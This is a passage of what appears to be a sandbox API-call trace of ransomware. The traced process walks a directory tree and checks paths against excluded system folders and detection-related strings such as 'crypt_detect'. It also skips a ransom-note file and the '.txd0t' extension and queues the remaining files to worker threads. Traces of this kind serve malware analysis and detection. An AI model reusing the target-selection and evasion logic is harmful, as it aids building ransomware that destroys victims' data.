ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.725] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0086.725] GetProcessHeap () returned 0xe30000 [0086.725] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.725] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0086.725] StrCmpW (psz1="3082", psz2=".") returned 1 [0086.726] StrCmpW (psz1="3082", psz2="..") returned 1 [0086.726] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="3082", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\system32\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\system\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\local\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\boot\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\perflogs\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\programdata\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\drivers\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\wsus\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="crypt_detect") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="cryptolocker") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="ransomware") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\WINDOWS") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\Program Files") returned 0x0 [0086.726] GetProcessHeap () returned 0xe30000 [0086.726] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0086.726] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0086.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\*") returned="C:\\588bce7c90097ed212\\3082\\*" [0086.726] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0086.727] StrCmpW (psz1=".", psz2=".") returned 0 [0086.727] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.727] StrCmpW (psz1="..", psz2=".") returned 1 [0086.727] StrCmpW (psz1="..", psz2="..") returned 0 [0086.727] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0086.727] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0086.727] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0086.727] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0086.727] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0086.727] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned="C:\\588bce7c90097ed212\\3082\\eula.rtf" [0086.727] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.727] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0086.727] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.727] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.727] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0086.728] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0086.737] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.737] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\3082\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\3082\\eula.rtf" [0086.737] SetEvent (hEvent=0x408) returned 1 [0086.738] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.738] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.738] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.738] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0086.738] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0086.738] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" [0086.738] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.738] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.738] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.738] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.738] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.738] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0086.750] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.750] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" [0086.750] SetEvent (hEvent=0x3fc) returned 1 [0086.750] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.750] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.750] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.750] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0086.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0086.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" [0086.750] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.750] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.751] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.751] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.751] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.751] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.751] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0086.751] GetProcessHeap () returned 0xe30000 [0086.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.751] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0086.751] StrCmpW (psz1="Client", psz2=".") returned 1 [0086.751] StrCmpW (psz1="Client", psz2="..") returned 1 [0086.751] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.751] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.751] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Client", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0086.751] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\system32\\") returned 0x0 [0086.751] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.751] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\system\\") returned 0x0 [0086.751] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.751] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\local\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\boot\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\perflogs\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\programdata\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\drivers\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\wsus\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="crypt_detect") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="cryptolocker") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="ransomware") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\WINDOWS") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\Program Files") returned 0x0 [0086.752] GetProcessHeap () returned 0xe30000 [0086.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ba) returned 0xed76e0 [0086.752] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0086.752] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\*", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\*") returned="C:\\588bce7c90097ed212\\Client\\*" [0086.752] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2170 [0086.752] StrCmpW (psz1=".", psz2=".") returned 0 [0086.752] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.752] StrCmpW (psz1="..", psz2=".") returned 1 [0086.752] StrCmpW (psz1="..", psz2="..") returned 0 [0086.752] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0086.752] StrCmpW (psz1="Parameterinfo.xml", psz2=".") returned 1 [0086.752] StrCmpW (psz1="Parameterinfo.xml", psz2="..") returned 1 [0086.753] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0086.753] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0086.753] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="Parameterinfo.xml", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" [0086.753] PathFindExtensionW (pszPath="Parameterinfo.xml") returned=".xml" [0086.753] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="bootsect.bak") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="iconcache.db") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="thumbs.db") returned -1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2=" ransomware ") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2=" ransom ") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="debug.txt") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="boot.ini") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="desktop.ini") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="autorun.inf") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntuser.dat") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntldr") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntdetect.com") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="bootfont.bin") returned 1 [0086.753] StrCmpIW (psz1="Parameterinfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.753] PathFindExtensionW (pszPath="Parameterinfo.xml") returned=".xml" [0086.753] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.753] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0086.834] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.834] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" [0086.834] SetEvent (hEvent=0x418) returned 1 [0086.834] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0086.834] StrCmpW (psz1="UiInfo.xml", psz2=".") returned 1 [0086.834] 